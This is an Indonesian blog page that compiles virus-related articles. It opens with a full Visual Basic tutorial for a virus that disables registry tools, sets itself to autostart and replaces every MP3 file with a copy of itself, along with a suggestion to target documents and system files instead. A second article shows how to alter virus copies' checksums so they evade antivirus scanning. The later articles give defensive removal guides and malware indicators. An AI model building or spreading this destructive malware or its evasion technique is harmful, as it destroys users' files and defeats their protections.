Rabu, Desember 10, 2008

FULL TUTORIAL MEMBUAT VIRUS MP3 UNTUK MENGURANGI PEMBAJAKAN LAGU

Huehehehehe...tiba2 kepribadian jahat saya muncul....(setan bertanduk lageeee)....kali ini kita akan membahas pembuatan virus penghancur mp3...loh loh loh...mas...kok gitu...hehehehehe...iya neh...kebetulan para seniman terutama pencipta lagu kita sedang dilanda stress karena lagunya dengan seenaknya dibajak oleh para user seperti kita...Muahahahahaha!....ya iyalah kalo gak pakek musik saya juga bisa mati kalau sedang melakukan programming...JADI YAH BAJAK SAJA!!!!


Virus MP3 virii

Keterangan dari virus ini hanya mencari file berekstensi mp3 dan TANPA AMPUN menghapus seluruh file MP3 yang ada di komputer anda...yaaaaaaa....gak enak dunk...lah namanya membuat virus ya buebas dooo....masak mau ditahan2....hueheheheheh...., ciri2 yang dari virus ini adalah :

1. menon aktifkan :
- Folder Option
- Penglihatan Extensi file (.doc, .exe, .mp3), maksudnya jika kita di windows explorer bisa melihat ekstensi file maka kita tak akan melihat ekstensi file tersebut, biasa pertahanan diri gitu
- mengunci regedit (seperti biasa)
- mematikan winamp secara tiba2 jika file virus aktif

bisa dilihat pada code dibawah ini:

Dim titik As String
titik = """"

CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ServiceOptionMP3", _
titik & "c:\windows\winamp.dll.exe" & titik
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption", "STOP PIRACY!!!!"
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!"
Shell "taskkill /f /im winamp.exe", vbHide

2. Mencari file berekstensi .mp3 yang ada di hardisk, lihat saja code di bawah ini :

'///////////////////////Sub Perangkap Hardisk/////////////
Sub cari()
Dim ictr As Integer

'If InStr(cboDrives.Text, "All Hard Drives") > 0 Then
For ictr = 0 To UBound(sDrives)
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
GetFiles sDrives(ictr), True, "*.mp3"
Next
'Else
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
' frmMain.GetFiles cboDrives.Text, True, "*.doc"
'End If

' frmMain.Visible = True



End Sub


Dan kode ini untuk mencari seluruh partisi hardisk yang ada di komputer

Dim ictr As Integer
Dim iDriveCount As Integer
Dim sAllDrives As String
Dim sDrive As String
ReDim sDrives(0) As String

For ictr = 66 To 90
sDrive = Chr(ictr) & ":\"
If DriveType(sDrive) = "Fixed Drive" Or DriveType(sDrive) = "Removable Drive" Then
If sAllDrives <> "" Then sAllDrives = sAllDrives & ", "
sAllDrives = sAllDrives & sDrive
iDriveCount = iDriveCount + 1
End If
Next

3. Mencari dan MELAHAP SELURUH FILE MP3 TANPA AMPUN, lihat code di bawah ini:

'//////////////////////////////Sub perangkap File/////////////////////
Public Sub GetFiles(Path As String, SubFolder As Boolean, Optional Pattern As String = "*.*")

'Screen.MousePointer = vbHourglass

'Dim li As ListItem
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
Dim bawa As Long

fPath = AddBackslash(Path)

Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern


hFile = FindFirstFile(fName, WFD)

On Error Resume Next
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If

If hFile > 0 Then
While FindNextFile(hFile, WFD)
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If
Wend
End If

If SubFolder Then


hFile = FindFirstFile(fPath & "*.*", WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then

GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If

While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then


GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend

End If
FindClose hFile
'Set li = Nothing



'Screen.MousePointer = vbDefault

End Sub

Nah setelah terkena file ini maka yang akan terjadi seluruh file mp3 akan berubah menjadi .exe dan file .mp3 akan dihapus tanpa amapun....buehehehehehe....jadi ya siap - siap mem-backup hardisk anda terutama file mp3. OKeh......ih kok jahat sekali sih.....ya sekali lagi membuat virus itu harus jahat.

-------------------------------TIPS SETAN-----------------------------------

COBA YANG DICARI BUKAN FILE MP3 SAJA TAPI FILE SISTEM ATAU FILE .DOC .XLS DAN .DAT, BUKANKAH ITU MENYENANGKAN?Tapi tetep saja menjadi penghancur.....seorang virus maker yang baik tidak akan menghancurkan tapi akan membuat dunia lebih baik lewat komputer tul gak...
-------------------------------------------------------------------------------

Di sini kita hanya belajar bagai mana virus tersebut bekerja...bagaimana virus tersebut di program, sehingga kita tau jalan dan proses virus tersebut dan sekaligus menyelamatkan bangsa kita dari aktifitas pembajakan - pembajakan......soalnya NENEK MOYANGKU SEORANG PELAUT, coba nenek moyangku seorang sarjana atau seorang dermawan, pasti kita hasilnya beda kan...huahahahahaha....yang jelas program ini dapat dijadikan untuk proteksi file apa saja. Misalnya kita punya e-book gratis, lalu dibajak sama orang...ck ck ck kasian sudah gratis dibajak pula...nah untuk memberi pelajaran kepada orang itu gunakan program ini....hihihihihi...yang jelas ini ilmu dan tidak boleh disembunyikan, saya tidak bertanggung jawab atas kerusakan yang terjadi di komputer anda.

Tetapi yang jelas virus ini MASIH BANYAK KELEMAHANNYA, mungkin anda dapat mengembangkannya sendiri. Terserah ingin dikembangkan kode penyebarannya, kode pertahannannya atau judul lagunya mau di rubah, bukan Samson-Naluri Lelaki lagi, tapi mungkin lagi lain yang akhir - akhir ini sedang naik daun. kayak lagu apaaaaaaa gitu pokoknya....nah sekarang coba bedakan gambar di bawah ini, mana yang virus hayooohhhh!!!!!



Diambil dari www.virologi.info

NAKALNYA VIRUS YANG MIRIP BRONTOK

hi...ketemu lagi.....virus - virus banyak bertebaran di ruang angkasa....semakin lama semakin nakal para virus ini. Ada yang menghapus file, ada yang menyembunyikan folder. Nah sama kayak virus yang emang mirip brontok ini.



Kok bisa mirip brontok sih mas? Iya...coba lihat gambar berikut ini, jadi file virusnya mempunyai icon berwarna kuning dengan nama file sama dengan folder, folder yang ada di drive anda. misalnya anda punya folder bernama "My Documents", maka virus ini akan membuat file virus dengan nama "My Documents.exe".





CIRI - CIRI YANG TERKENA VIRUS

Ciri - ciri komputer yang terkena virus ini adalah:
1. Menu Run, Search disembunyikan
2. Regedit dan MSCONFIG tidak dapat dibuka
3. Folder asli pada komputer anda disembunyikan dan diganti dengan file virus
4. Muncul user bernama Ign. Basuki
5. Di My Documents Muncul file :
- Data Ign. Basuki.exe
- Lagu - Server.scr
- Love Song.scr
- New mp3 BaraT !!.exe
- Norman virus Control 5.18.exe
- Windows Vista setup.scr
6. Di direktori C:\Documents and Settings\ ada direktori bernama Ign. Basuki, karena virus membuat user Ign. Basuki

UNTUK ITU BERHATI - HATILAH BAGI PARA ADMIN YANG MEMPUNYAI KOMPUTER SERVER DAN TERKENA VIRUS TERSEBUT. VIRUS INI MEMBUAT USER Ign. BASUKI. MAKA KOMPUTER YANG TERINFEKSI, ATAU SERVER ANDA DAPAT DIMASUKI OLEH ORANG LAIN DENGAN USER Ign. BASUKI---------------------------------------------------------



FILE INDUK VIRUS

File induk virus terletak di :

C:\WINDOWS\ dengan nama file p096743.exe
C:\Windows\ dengan nama file EmangEloh.exe

Sedangkan file lainnya bernama :

jb3248432.exe
act.exe
aa.bat
Ino.com
n1296371.cmd
ykrp.com


REGEDIT

Virus mengubah beberapa nilai registri di:

Alamat : Hkey_Current_User/Software/Microsoft/Windows/CurrentVerrsion/Run

Key:
T085

Value:
p096743.exe

Alamat : Hkey_Current_User/Software/Microsoft/Windows/CurrentVerrsion/Run

Key:
T085

Value:
jb3248432.exe

Alamat:
Hkey_Local_Machine/Software/Microsoft/Windows/CurrentVerrsion/Run

Key:
System

Value:
C:\Windows\EmangEloh.exe


PESAN SPONSOR

Pesan sponsor yang ditampilkan oleh virus seperti tulisan di bawah ini:

MoonligHt[A]



they still hurt me ..

in the Moonlight , ill die

i can't wait tommorow ,

it's so much to long

goodbye Sickness



Specially to LanElitta

Gw Sadar Kalo Kitamemang tidak bisa bersatu di dunia fana : (

sekarang bagi gw kematian begitu indah di mata gw

by | HellSPAWN |

wah wah wah...manisnya.....hiks hiks jadi pengen nangich....



PENANGGULANGAN

1. Download ShowKillProcess.exe di www.virologi.info/download/
2. Jalankan ShowKillProcess.exe, cari nama process di bawah ini dan kill :

p096743.exe
EmangEloh.exe
jb3248432.exe
act.exe
aa.bat
Ino.com
n1296371.cmd
ykrp.com

3. Dengan memakai WAVBeta update terbaru, Scan File Virus tersebut, terutama di direktori:
- My Documents
- C:\Documents and Settings
- C:\Windows\

4. Cari File dengan nama di bawah ini dan hapus:

p096743.exe
EmangEloh.exe
jb3248432.exe
act.exe
aa.bat
Ino.com
n1296371.cmd
ykrp.com
Data Ign. Basuki.exe
Lagu - Server.scr
Love Song.scr
New mp3 BaraT !!.exe
Norman virus Control 5.18.exe
Windows Vista setup.scr

5. Cari file aplikasi dengan besar 42 kb dan punya icon direktori berwarna kuning.

6. Buka MSConfig dan hilangkan tanda centang pada nama Ino
7. Login Sebagai Administrator, hapus user dengan nama Ign. Basuki
8. Kemudian Hapus Folder Ign. Basuki yang ada di C:\Documents and Settings

Virus Header Modifier

Sudah baca buku seni pemrograman aplikasi Xtreme coding menggunakan Visual basic oleh A.M. HIRIN ? Kalo sudah pasti tau dong Program Header Modifier dan apa funsinya? Sejenak mengingat tutorial di virologi yang telah saya buat tentang AV vs VM dimana sang AV menggunakan database string ceksum CRC32 dalam mengenali sebuah file. Jika file tersebut terdaftar dalam database string ceksum CRC32 maka file tersebut digolongkan virus dan AV akan melakukan proses pemusnahan (delete).



Mengapa para AV menggunakan teknik ini? Alasan pertama yang saya ambil karena proses copy-paste. Sebuah file jika di copy kemudian di paste maka dengan kata lain akan terjadi duplikat yang sama persis baik wajah,karakter,ukuran, jenis ataupun wataknya. Kemudian AV menggunakan cheksum CRC32 atau MD5 untuk mengenali ceksum dari virus dan peranakannya.


Lalu apa kaitannya dengan buku yang saya sebutkan di awal? Jelas ada kaitannya, disini saya akan mengembangkan project dari mas HIRIN, hehehe boleh yam mas….? Tunggu project itu fungsinya apaan? Fungsinya adalah untuk memodifikasi sedikit data yang ada di bagian awal suatu file PE atau pun file berekstensi .exe .Maksudnya apaan sih? Singkat kata memodifikasi string cheksum suatu file .exe . Wah jangan-jangan mau dikembangkan jadi virus nih? Hehehe....ga kok ga salah maksudnya tapi ga segitunya kok.Next…apa yang kita butuhkan? Logika? Sedikit teknik? Dan sedikit cemilan kali lihat project tersebut:



Lihat logika alur jalannya program, ternyata program berjalan setelah kita menentukan dimana alamat file .exe yang akan kita rubah, lalu kita mengeksekusi/ merubah ceksum dengan menekan tombol modify? Lalu apa yang harus dilakukan? Tolol masi tanya aja ya dibuat pengalamatan langsung, Ga Usah Nulis-nulis Gitu? Gimana caranya biar alamatnya bisa kedaftar sendiri? Wah tanya mulu lo dengerin dulu lihat object apa aja yang di pakai,yang perlu dicermati Textbox = Text1 nah disini kita perlu mendifinisikan/ mendaftarkan alamatnya


Text1.Text = " D\Bokep.exe "


Lalu lakukan pemanggilan fungsi Modif (pada modul) berfungsi untuk meng-injeksi/memasuukan data yang sudah ditentukan sehingga dapat mengubah ceksum CRC tanpa merusak jalannya program.


Modif Text1.Text


Disini kita akan ubah ceksum CRC peranakan virus dengan nama Bokep.exe terletak di Drive D


Wah apa harus gitu? Ga juga,klik aja textbox-nya lalu cari bagian properties –alphabethic-text isi dengan alamat tersebut,hasilnya sama aja kok. Trus gimana biar ga pencet tombol? Ya dibuat load langsung bisa dengan timer atau dengan Private Sub Form_Load.



Kok Cuma satu? Aku kan pengennya banyak peranakan yang aku rubah…wuh…masak harus aku ajarin? dah…mulai dari logika pertama apa? Textbox =tempat alamat virus lha terus? Tolol..ya tambah textbox-nya, lalu tambah Script untuk perubahan ceksum CRC-nya….O.gitu ya..(AH…OH….mulu lo…)


Dengan modul yang sama seperti gambar berikut:



Tapi kok formnya keliatan gitu ga seru ah? Ya tinggal tambahin Form1.Hide.Untuk source peng-copy-an virusnya ga usah aku terangin ya da pada tau semuakan..lagian ga baik nerangin yang kaya gitu (huehuehue….)jalankan program….kok ga da apa-apa?iya mang dibuat gitukan… lalu cek ceksum CRC32nya dengan CRC generator misal virus induk ceksumnya : 94ADC1FA lalu seksum virus peranakannya setelah dimodif menjadi: F6E7B891 wew…sukses..dengan begini peranakan virus memiliki ceksum yang berbeda dengan induknya dan tidak mengubah kinerjanya ( tp lolos dari scanning AV )hehehe…


Sebenarnya ada satu cara lagi agar ceksum induk berbeda dengan ceksum peranakannya, yah seperti pemikiranku yang dulu yaitu bikin peranakan dengan ukuran size yang berbeda tapi tidak mengubah kinerjanya jadi kinerjanya harus sama seperti file induknya wew……


Segala Penyalahgunaan adalah dalam rangka pembelajaran,Saya tidak bertanggung jawab atas tindakan ataupun perbuatan anda.

Diambil dari www.virologi.info

Senin, Desember 08, 2008

ArrS, Heuristic Licik untuk Deteksi Virus ! by AM HIRIN

Hii ALL,kali ini aku akan coba sedikit kasih informasi tentang sebuah Heuristic yang baru selesai aku tulis. Hmm.mmm.., moga aja informasi berguna baik untuk kejahatan maupun kebaikan.

Apakah itu ArrS ?
ArrS atau kependekan dari Auto xxx read System adalah sebuah teknik heuristic Antivirus untuk mengenali ratusan virus bahkan ribuan virus tanpa database secara temporary ( artinya suatu saat berbeda – beda sesuai kasus tertentu) dengan mengambi informasi yang diberikan si Virus itu sendiri ( licik banget gak sech ), Teknik ini dibuat untuk membantu User yang ingin mendapatkan Antivirus tanpa Update dengan database yang terbaru,karena sifat dari ArrS ini sendiri mengambil informasi yang diberikan oleh virus sendiri ( Ko’ bisa yach …, bisa aja kali yach )
Sebenarnya teknik ini sangat simple dan praktis untuk dibuat, hanya saja kebanyakan dari para enggineer Antivirus belum menyadari akan hal tersebut, padahal mereka tahu bahwa setiap virus akan memberikan informasi kepada system / user agar mereka dieksekusi baik secara sengaja maupun secara tidak sengaja. Dan yang lebih mengejutkan lagi, ArrS hanya membutuhkan tempat sekitar 20-25 baris jika ditulis dalam bahasa Visual Basic dengan algoritma saya. Memang benar jika seorang pepatah dari jawa bernama strReverse(“IEM”) mengatakan “Ilanging nyawa bisa seka methune lambe ( hilangnya nyawa bisa datang dari perkataan )”, kata-kata ini yang mendasari dibuatnya ArrS ( Lhoo apa hubunganya ), hubunganya begini : Seperti yang telah saya katakan bahwa ArrS mengenali virus dari informasi yang diberikan virus itu sendiri, sehingga si Virus bisa dibasminya – jelaskan maksudnya dengan maksud pepatah tadi. Okay dech, mungkin penjelasan dan basa – basi tentang ArrS cukup sampai disini kita akan coba melihat bukti dan manfaatnya secara langsung !
Manfaat ArrS !
- Memungkinkan pengguna Antivirus membereskan virus tanpa repot – repot mengupdate database kecuali kasus virus tertentu
- Mencegah serangan virus ( hampir semua virus ) via flahdisk
- Membantu membereskan unknown virus yang terlanjur mengakar di computer dengan bantuan flashdisk
- Kecepatan Antivirus meningkat drastis jika hanya menggunakan level cek ini saja
Kekuatan ArrS
Pada dasarnya kuat tidaknya penerapan teknik heuristic ArrS pada sebuah Antivirus dipengaruhi hal – hal berikut
a. Ceksum yang digunakan dengan ArrS ( M-31 Pattern G.1 pada ArrS saya )
b. Logaritma pembacaan informasi yang diberikan Virus
Fakta tentang ArrS
Nah kali ini saya akan berikan bukti tentang kemampuan licik ArrS G.1 yang telah saya terapkan pada sebuah Antivirus Lokal ( Kendal AV S.E 2 ) untuk mengatasi virus yang belum dikenali oleh Antivirus Tersebut sebelumnya ( Nb : Virus yang diujikan menyerang beberapa laptop milik SMA 1 cepiring, dengan pertahanan AVG ), setelah saya selesai menulis ArrS pada KAV S.E 2 maka saya menjalankan virus tersebut kekomputer saya, lalu saya tunggu beberapa menit ternyata Virus itu sudah berbuat ulah di computer saya yang nota bene masih Pera…..tit..tit..(Sensor), dan mulai memblokir akses ke registry,MsConfig,Antivirus Luar, dll. Akhirnya saya tancapkan Flashdisk ke computer agar dia juga menyerangnya,lalu saya Scan dengan KAV S.E 2 dengan hasil sbb:
Scan Pertama !



Wow.. ternyata flash saya telah diinfeksinya, dan KAV S.E 2 mampu mendapatkan virus tersebut dengan mudah tanpa menggunakan database ( lihat objek sytem.exe dan artikel ku.exe ), lalu karena saya menggunakan ArrS ini sebagai pembersihan maka untuk memastikan computer saya terbebas dari virus tersebut maka saya melakukan Scan ulang di Flash saya tersebut,
Scan Kedua!
Hasil Scan kedua kalinya pada Flash saya adalah sbb :





Lihatlah KAV S.E 2 dengan ArrS nya mendapatkan satu mahluk lagi yaitu: Mssmsgs.exe yang berada pada dir WINDOWS\system32,objek tersebut sebelumnya merupakan process utama virus yang tidak diketahui tersebut, dan segera bisa terdeteksi setelah KAV dengan ArrS mendapatkan informasi dari kawan-kawanya yang terdeteksi saat Scan Pertama (Licik Kan !).
Kelemahan ArrS !
Tidak dapat dipungkiri bahwa segala sesuatu didunia punya kelebihan dan kekurangan, seperti halnya saya paling enggak tahan banget kalo digoda wanita cantik gak pake Bra.. (ha9x) begitu juga ArrS G.1 yang ada pada KAV S.E. Tanpa bermaksud menutupi kekuranganya berikut saya berikan kelemahan ArrS G.1 ini
a) Mengenali 1 jenis Unknown virus pada setiap Sesion Scan, secara temporary. Padahal ini bertujuan agar tidak membengkakan databasenya.
b) Belum mampu mendeteksi file2 yang terinfeksi virus ( untuk induknya sudah ) dengan high level technique seperti (Alman dan Sality) karena masih menggunakan ceksum M-31 dan belum dipadukan dengan PC’s yang telah ada pada KAV S.E
c) Jika dalam Flash terdapat 2/3 jenis Virus yang menyerang,maka yang akan dikenali hanyalah jenis yang paling atraktif diantara mereka. Karena yang lainya dianggap penyerang pasif dan tidak punya exploiter / informasi tentang dirinya
d) Tidak mengenali unknown virus pada flash jika informasi tentang virus tsb telah corrupt alias dihapus software atau Antivirus lain, maka dahulukan Scan dengan Antivirus yang dilengkapi ArrS ( KAv S.E 2 ) sebelum Scan dengan Antivirus lain
e) Tidak mengenali virus yang bersifat pasif ( dikarantina atau virus sebagai percobaan )yang tidak dijalankan pada computer atau tidak melakukan aktifitasnya sendiri
Hm..m.mm banyak juga kan kelemahanya,tapi kelemahan itu akan segera terkurangi jika factor – factor yang mempengaruhi ArrS diperbaiki.
Jika anda penasaran dengan kemampuan ArrS ini silahkan mencoba, dengan mendownload Antivirus KAV S.E 2 build.A, atau jika mungkin anda seorang Engineer Antivirus saya persilahkan untuk menambahkan ArrS / Teknik sejenis kedalam Engine AV anda ( jika Anda berkenaan ).
Untuk mendapatkan Kendal AV S.E 2 dan informasi lebih detail tentang penggunaan dan teknik ArrS, silahkan pergi ke blog sederhananya ? di
http:// www.kav2008.wordpress.com , cari halaman download atau postingnya

Selamat menikmati kemudahan Era Antivirus Lokal tak berbayar
diambil dari : www.virologi.info

Hajar X-Fly.Worm dengan Morphost.

Kali ini saya akan jelaskan bagaimana menghajar X-Fly dan mengusir X-Fly dari komputer jelekmu…

Tentunya pakai Morphost donks.



Ciri-ciri X-Fly.Worm gak perlu kujelasin lagi, soalnya saya dah pernah membahas analisa X-Fly di artikel yang lain. Silakan cari saja artikel saya itu di google atau di: http://www.morphostlab.co.nr



Kalo komputermu lagi kena worm ini dan kepengen worm ini minggat dari komputermu, ikuti saja langkah-langkah berikut:




  1. Hidupkan Morphostmu.


Banyak sekali proses dari virus ini, jadi ada kemungkinan kalo morphost gak bisa hidup. Kalo misalnya gak bisa hidup maka gak ada jalan lain deh....


Tapi terkadang ada yang bisa hidup tapi butuh waktu yang lama. Bahkan saat kita hidupkan morphost ada jenjang waktu sekitar 20 detik tidak terjadi apa-apa di komputer. Tapi setelah itu morphost baru muncul!





  1. Scan Komputermu.


Silakan scan komputermu dengan Morphost. Supaya X-Fly bisa terdetek morphost, gunakan database ke 18 ke atas. Muncul pertanyaan gimana kalo kita gak pake database ke 18?


Jawabannya gak masalah. Asalkan kita pintar menggunakan Morphost. (silakan baca artikel morphost lainnya tentang tehnik morphost)





  1. Hapus virus


Silakan hapus virus yang sudah terdeteksi oleh Morphost. Namun dari sekian banyak file, ada satu file yang tidak bisa dihapus! File tersebut adalah ”C:\windows\system32\Rcss.exe”


Supaya file itu bisa terhapus matikan / terminate dulu proses virus itu





  1. Matikan proses virus


Untuk mematikan proses virus, kamu gak bisa pake morphost task manager (soalnya udah kucoba dan gak bisa). Silakan pake task manager!





  1. Aktifkan Task Manager


Muncul pertanyaan. Task manager kan didisable oleh worm X-Fly? Ya tentu saja. Gunakan saja registry tweaker morphost atau registry tweaker apa saja yang bisa mengaktifkan task manager. Lalu matikan proses yang bernama “Rcss.exe”





  1. Perbaiki registry yang rusak


Silakan perbaiki registry yang sudah dirusak oleh X-Fly. Untuk mengetahui alamat registry apa saja yang sudah dirusak oleh X-fly, baca saja artikel saya mengenai analisa worm ini.

diambil dari : www.virologi.info

Ad-ware/Malware: Antivirus 2008

Ya, nama Ad-ware ini dapat menipu para pengguna komputer. Karena namanya, yaitu Antivirus 2008, Ad-ware ini akan terdengar seperti Antivirus asli. Apalagi bila anda melihat di Security Center. Ad-ware ini telah mengganti Security Center dengan Ad-ware ini. Dengan begitu, Security Center seakan menyuruh User untuk meregister Antivirus 2008. Ad-ware ini pun akan membuat Blue Screen palsu serta boot palsu. Kadang-kadang, ad-ware ini akan memperlihatkan "boot screen" palsunya dalam beberapa waktu, seakan komputer di-restart oleh suatu virus. Sialnya lagi, Ad-ware ini akan terus menerus memunculkan window "Virus Detected". Tentu saja ini akan sangat mengganggu. Baiklah, inilah cara penghapusan Manualnya (Manual Remove):

1. Pastikan Folder Option memperlihatkan semua file hidden & system

2. Buka Task Manager. Untuk shortcut lebih cepatnya, CTRL + SHIFT + ESC

3. Pada tab Processes, matikkan Proses-proses berikut ini:
- AntiVirus2008.exe
- AV2008.exe
- AntvrsInstall.exe
- AntvrsInstall[1].exe
- Antvrs.exe

4. Gunakan fitur "Find" atau "Search" pada Windows. Cari dan hapus file-file berikut ini:
- AntiVirus2008.exe
- AntvrsInstall.exe
- AntvrsInstall[1].exe
- Antvrs.exe
- AV2008.exe
- AntiVirus2008.exe
- AntiVirus2008.lnk
- Uninstall AntiVirus2008.lnk

5. Klik Start > Run atau Shortcutnya yaitu CTRL + R untuk membuka window "Run"

6. Ketikkan 'regedit' (tanpa tanda petik) pada window "Run"

7. Hapus Registry - registry berikut ini:
- HKEY_CURRENT_USER\Software\Antivirus
- HKEY_LOCAL_MACHINE\SOFTWARE\Antivirus
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion \Uninstall\AntiVirus2008

8. Untuk penghapusan lebih lanjut, silahkan unduh Malware Bytes di http://malwarebytes.org

9. Scan komputer anda dengan Malware Bytes

10. Hapus semua Malware yang terdeteksi

11. Selesai....
diambil dari : www.virologi.info

Analisa NovemberGen.svchost

(BACA: Hasil analisa berikut tidak sepenuhnya benar, mungkin saja saya salah menganalisa!)


Hasil Analisa


Nama Malware : NovemberGen.Scvhost.Worm [Morphost], Trojan-Downloader.Win32.VB.inz [Kaspersky Lab]


Ukuran : 337,466 bytes


Pengirim Virus : D3mon


Icon : regedit.


CRC32 : A369C91A (berdasarkan file yang dikirim)


MD5 : DD7132C1F4F317115C4979607B37EC4A (berdasarkan file yang dikirim)


Dibuat dengan : Visual Basic



Lokasi Project Virus:


D:\Microsoft\Microsoft\windows\System.vbp



Di dalam tubuh virus terdapat resource yang berupa gambar seperti dibawah ini:


image003



===============================================================



[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile]


NeverShowExt = ""


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.Msd\Shell\Open\Command]


(Default) = "%1"


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.Msd\DefaultIcon]


(Default) = "%System%\rasphone.exe"


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.Msd]


(Default) = "Microsoft System Direct"


NeverShowExt = ""


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.sysm\Shell\Open\Command]


(Default) = "%1"


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.sysm\DefaultIcon]


(Default) = "%System%\netsetup.exe"


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.sysm]


(Default) = "System Mechanic"


NeverShowExt = ""


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]


VisualStyle = "%System%\Desktop.sysm"


[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]


regtweak = "regtweak.exe"


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ShowFullPath]


DefaultValue = 0x00000001


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]


CheckedValue = 0x00000001


DefaultValue = 0x00000001


[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot]


AlternateShell = "%System%\CommandPrompt.Sysm"


[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot]


AlternateShell = "%System%\CommandPrompt.Sysm"


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]


AlternateShell = "%System%\CommandPrompt.Sysm"



Kalau ada penyerangan lainnya silakan beritahu saya.


Signature worm ini sudah saya masukkan ke dalam database Morphost yang ke 17.

diambil dari : www.virologi.info